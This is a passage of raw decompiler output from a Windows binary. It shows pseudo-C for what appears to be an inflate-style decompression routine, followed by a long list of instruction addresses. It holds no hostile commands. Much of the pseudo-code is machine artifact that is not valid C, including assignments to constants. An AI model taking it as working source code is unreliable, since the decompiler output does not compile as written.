													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E00406848( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e3b8;
												if( *0x42e3b8 != 0) {
													L22:
													_t412 =  *0x4093f8; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x4093fc; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d234; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42d230; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d238;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d6b8;
													if(_t416 < 0x42d6b8) {
														L15:
														__eflags = _t416 - 0x42d474;
														_t438 = 8;
														if(_t416 > 0x42d474) {
															__eflags = _t416 - 0x42d638;
															if(_t416 >= 0x42d638) {
																__eflags = _t416 - 0x42d698;
																if(_t416 < 0x42d698) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E004068B0(0x42d238, 0x120, 0x101, 0x407328, 0x407368, 0x42d234, 0x4093f8, 0x42db38, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d238, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d238 + _t440;
														E004068B0(0x42d238, 0x1e, 0, 0x4073a8, 0x4073e4, 0x42d230, 0x4093fc, 0x42db38, _t448 - 8);
														 *0x42e3b8 =  *0x42e3b8 + 1;
														__eflags =  *0x42e3b8;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x10;
												if(__ebx >= 0x10) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E0040568C( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E00406848( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x4093d4 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x4093d4 + __eax * 2) & 0x0000ffff =  *(0x4093d4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x4093d4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E004068B0( &(__esi[3]), __edi, 0x101, 0x407328, 0x407368, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E004068B0(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x4073a8, 0x4073e4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E00406848( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                                                                          0x004060d9
                                                                          0x004060d9
                                                                          0x004060d9
                                                                          0x004060d9
                                                                          0x004060d9
                                                                          0x004060dd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004060e3
                                                                          0x004060e3
                                                                          0x004060e6
                                                                          0x004060e9
                                                                          0x004060ee
                                                                          0x004060f0
                                                                          0x004060f3
                                                                          0x004060f6
                                                                          0x004060f9
                                                                          0x004060f9
                                                                          0x004060fc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004060fe
                                                                          0x004060fe
                                                                          0x00406101
                                                                          0x00406106
                                                                          0x00406108
                                                                          0x0040610b
                                                                          0x00406111
                                                                          0x00405e70
                                                                          0x00405e70
                                                                          0x00405e73
                                                                          0x00405e79
                                                                          0x00405e7f
                                                                          0x00405e88
                                                                          0x00405e8e
                                                                          0x00405e91
                                                                          0x00405e98
                                                                          0x00405e9d
                                                                          0x00405ea3
                                                                          0x00405eae
                                                                          0x00405eae
                                                                          0x00406117
                                                                          0x00406117
                                                                          0x00406121
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406127
                                                                          0x00406127
                                                                          0x0040612b
                                                                          0x0040612e
                                                                          0x0040612e
                                                                          0x00406132
                                                                          0x00406138
                                                                          0x00406138
                                                                          0x0040613b
                                                                          0x0040613e
                                                                          0x00406144
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406146
                                                                          0x00406168
                                                                          0x00406168
                                                                          0x0040616b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406148
                                                                          0x0040614c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406152
                                                                          0x00406152
                                                                          0x00406155
                                                                          0x00406158
                                                                          0x0040615d
                                                                          0x0040615f
                                                                          0x00406162
                                                                          0x00406165
                                                                          0x00406165
                                                                          0x0040616d
                                                                          0x0040616d
                                                                          0x00406173
                                                                          0x00406176
                                                                          0x00406179
                                                                          0x00406179
                                                                          0x00406180
                                                                          0x00406184
                                                                          0x00406188
                                                                          0x0040618b
                                                                          0x0040618e
                                                                          0x00406194
                                                                          0x00406199
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040619b
                                                                          0x004061af
                                                                          0x004061af
                                                                          0x004061b3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040619d
                                                                          0x004061a0
                                                                          0x004061a0
                                                                          0x004061a7
                                                                          0x004061ac
                                                                          0x004061ac
                                                                          0x004061ac
                                                                          0x004061b5
                                                                          0x004061b5
                                                                          0x004061b8
                                                                          0x004061c6
                                                                          0x004061cc
                                                                          0x004061d1
                                                                          0x004061d7
                                                                          0x004061dd
                                                                          0x004061e3
                                                                          0x004061ea
                                                                          0x004061fe
                                                                          0x004061fe
                                                                          0x004067cd
                                                                          0x004067cd
                                                                          0x004067cd
                                                                          0x004067d2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405e0a
                                                                          0x00405e0a
                                                                          0x00000000
                                                                          0x00406405
                                                                          0x00406405
                                                                          0x00406409
                                                                          0x0040640c
                                                                          0x0040640f
                                                                          0x00406412
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406418
                                                                          0x00406418
                                                                          0x0040643d
                                                                          0x0040643d
                                                                          0x0040643d
                                                                          0x0040643f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040641d
                                                                          0x0040641d
                                                                          0x00406421
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406427
                                                                          0x00406427
                                                                          0x0040642a
                                                                          0x0040642d
                                                                          0x00406430
                                                                          0x00406432
                                                                          0x00406434
                                                                          0x00406437
                                                                          0x0040643a
                                                                          0x0040643a
                                                                          0x0040643a
                                                                          0x00406441
                                                                          0x00406441
                                                                          0x00406449
                                                                          0x0040644c
                                                                          0x0040644f
                                                                          0x00406452
                                                                          0x00406456
                                                                          0x00406459
                                                                          0x0040645b
                                                                          0x0040645e
                                                                          0x00406460
                                                                          0x00406474
                                                                          0x00406474
                                                                          0x00406477
                                                                          0x00406491
                                                                          0x00406491
                                                                          0x00406494
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040649a
                                                                          0x0040649a
                                                                          0x0040649d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004064a3
                                                                          0x004064a3
                                                                          0x00000000
                                                                          0x004064a3
                                                                          0x00406479
                                                                          0x0040647c
                                                                          0x00406483
                                                                          0x00406486
                                                                          0x00000000
                                                                          0x00406486
                                                                          0x00406462
                                                                          0x00406466
                                                                          0x00406469
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004064ae
                                                                          0x004064ae
                                                                          0x004064d3
                                                                          0x004064d3
                                                                          0x004064d3
                                                                          0x004064d5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004064b3
                                                                          0x004064b3
                                                                          0x004064b7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004064bd
                                                                          0x004064bd
                                                                          0x004064c0
                                                                          0x004064c3
                                                                          0x004064c6
                                                                          0x004064c8
                                                                          0x004064ca
                                                                          0x004064cd
                                                                          0x004064d0
                                                                          0x004064d0
                                                                          0x004064d0
                                                                          0x004064d7
                                                                          0x004064df
                                                                          0x004064e2
                                                                          0x004064e5
                                                                          0x004064e7
                                                                          0x004064ea
                                                                          0x004064ea
                                                                          0x004064ec
                                                                          0x004064f0
                                                                          0x004064f3
                                                                          0x004064f6
                                                                          0x004064f9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004064ff
                                                                          0x004064ff
                                                                          0x00406524
                                                                          0x00406524
                                                                          0x00406524
                                                                          0x00406526
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406504
                                                                          0x00406504
                                                                          0x00406508
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040650e
                                                                          0x0040650e
                                                                          0x00406511
                                                                          0x00406514
                                                                          0x00406517
                                                                          0x00406519
                                                                          0x0040651b
                                                                          0x0040651e
                                                                          0x00406521
                                                                          0x00406521
                                                                          0x00406521
                                                                          0x00406528
                                                                          0x00406528
                                                                          0x00406530
                                                                          0x00406533
                                                                          0x00406536
                                                                          0x00406539
                                                                          0x0040653d
                                                                          0x00406540
                                                                          0x00406542
                                                                          0x00406545
                                                                          0x00406548
                                                                          0x00406562
                                                                          0x00406562
                                                                          0x00406565
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040656b
                                                                          0x0040656b
                                                                          0x0040656e
                                                                          0x00406575
                                                                          0x00000000
                                                                          0x00406575
                                                                          0x0040654a
                                                                          0x0040654d
                                                                          0x00406554
                                                                          0x00406557
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040657d
                                                                          0x0040657d
                                                                          0x004065a2
                                                                          0x004065a2
                                                                          0x004065a2
                                                                          0x004065a4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406582
                                                                          0x00406582
                                                                          0x00406586
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040658c
                                                                          0x0040658c
                                                                          0x0040658f
                                                                          0x00406592
                                                                          0x00406595
                                                                          0x00406597
                                                                          0x00406599
                                                                          0x0040659c
                                                                          0x0040659f
                                                                          0x0040659f
                                                                          0x0040659f
                                                                          0x004065a6
                                                                          0x004065ae
                                                                          0x004065b1
                                                                          0x004065b4
                                                                          0x004065b6
                                                                          0x004065b9
                                                                          0x004065b9
                                                                          0x004065bb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004065c1
                                                                          0x004065c1
                                                                          0x004065c4
                                                                          0x004065c9
                                                                          0x004065cb
                                                                          0x004065d1
                                                                          0x004065d3
                                                                          0x004065e8
                                                                          0x004065ea
                                                                          0x004065ea
                                                                          0x004065d5
                                                                          0x004065db
                                                                          0x004065dd
                                                                          0x004065df
                                                                          0x004065df
                                                                          0x004065ec
                                                                          0x004065f0
                                                                          0x004065f3
                                                                          0x004065f9
                                                                          0x004065f9
                                                                          0x004065fc
                                                                          0x004065fc
                                                                          0x004065fc
                                                                          0x004065fe
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406604
                                                                          0x00406604
                                                                          0x0040660a
                                                                          0x0040660c
                                                                          0x00406631
                                                                          0x00406634
                                                                          0x0040663a
                                                                          0x0040663f
                                                                          0x00406645
                                                                          0x0040664b
                                                                          0x0040664d
                                                                          0x00406650
                                                                          0x00406659
                                                                          0x0040665f
                                                                          0x0040665f
                                                                          0x00406652
                                                                          0x00406654
                                                                          0x00406656
                                                                          0x00406656
                                                                          0x00406661
                                                                          0x00406667
                                                                          0x00406669
                                                                          0x0040666c
                                                                          0x0040666e
                                                                          0x00406674
                                                                          0x00406676
                                                                          0x00406678
                                                                          0x0040667a
                                                                          0x0040667c
                                                                          0x0040667f
                                                                          0x00406688
                                                                          0x0040668b
                                                                          0x0040668b
                                                                          0x00406681
                                                                          0x00406681
                                                                          0x00406684
                                                                          0x00406684
                                                                          0x0040667f
                                                                          0x00406676
                                                                          0x0040668d
                                                                          0x0040668f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040668f
                                                                          0x0040660e
                                                                          0x0040660e
                                                                          0x00406614
                                                                          0x0040661a
                                                                          0x0040661c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040661e
                                                                          0x0040661e
                                                                          0x00406620
                                                                          0x00406622
                                                                          0x0040662b
                                                                          0x0040662b
                                                                          0x00406624
                                                                          0x00406624
                                                                          0x00406627
                                                                          0x00406627
                                                                          0x0040662d
                                                                          0x0040662f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406695
                                                                          0x00406695
                                                                          0x0040669a
                                                                          0x0040669c
                                                                          0x0040669d
                                                                          0x0040669e
                                                                          0x0040669f
                                                                          0x004066a5
                                                                          0x004066a8
                                                                          0x004066ab
                                                                          0x004066ae
                                                                          0x004066b0
                                                                          0x004066b6
                                                                          0x004066b6
                                                                          0x004066b9
                                                                          0x004066b9
                                                                          0x004066b9
                                                                          0x004066b9
                                                                          0x004066c2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004066c7
                                                                          0x004066c7
                                                                          0x004066ca
                                                                          0x004066cd
                                                                          0x004066cf
                                                                          0x00406766
                                                                          0x00406766
                                                                          0x00406769
                                                                          0x0040676b
                                                                          0x0040676c
                                                                          0x0040676d
                                                                          0x00406770
                                                                          0x00000000
                                                                          0x00406770
                                                                          0x004066d5
                                                                          0x004066d5
                                                                          0x004066db
                                                                          0x004066dd
                                                                          0x00406702
                                                                          0x00406705
                                                                          0x0040670b
                                                                          0x00406710
                                                                          0x00406716
                                                                          0x0040671c
                                                                          0x0040671e
                                                                          0x00406721
                                                                          0x0040672a
                                                                          0x00406730
                                                                          0x00406730
                                                                          0x00406723
                                                                          0x00406725
                                                                          0x00406727
                                                                          0x00406727
                                                                          0x00406732
                                                                          0x00406738
                                                                          0x0040673a
                                                                          0x0040673d
                                                                          0x0040673f
                                                                          0x00406745
                                                                          0x00406747
                                                                          0x00406749
                                                                          0x0040674b
                                                                          0x0040674d
                                                                          0x00406750
                                                                          0x00406759
                                                                          0x0040675c
                                                                          0x0040675c
                                                                          0x00406752
                                                                          0x00406752
                                                                          0x00406755
                                                                          0x00406755
                                                                          0x00406750
                                                                          0x00406747
                                                                          0x0040675e
                                                                          0x00406760
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406760
                                                                          0x004066df
                                                                          0x004066df
                                                                          0x004066e5
                                                                          0x004066eb
                                                                          0x004066ed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004066ef
                                                                          0x004066ef
                                                                          0x004066f1
                                                                          0x004066f3
                                                                          0x004066fa
                                                                          0x004066fa
                                                                          0x004066fc
                                                                          0x004066f5
                                                                          0x004066f5
                                                                          0x004066f7
                                                                          0x004066f7
                                                                          0x004066fe
                                                                          0x00406700
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406778
                                                                          0x00406778
                                                                          0x0040677b
                                                                          0x0040677d
                                                                          0x00406780
                                                                          0x00406783
                                                                          0x00406783
                                                                          0x00406783
                                                                          0x00406783
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405e31
                                                                          0x00405e15
                                                                          0x00000000
                                                                          0x00405e1b
                                                                          0x00405e1e
                                                                          0x00405e28
                                                                          0x00405e2b
                                                                          0x00405e2e
                                                                          0x00000000
                                                                          0x00405e2e
                                                                          0x00405e15
                                                                          0x00405e39
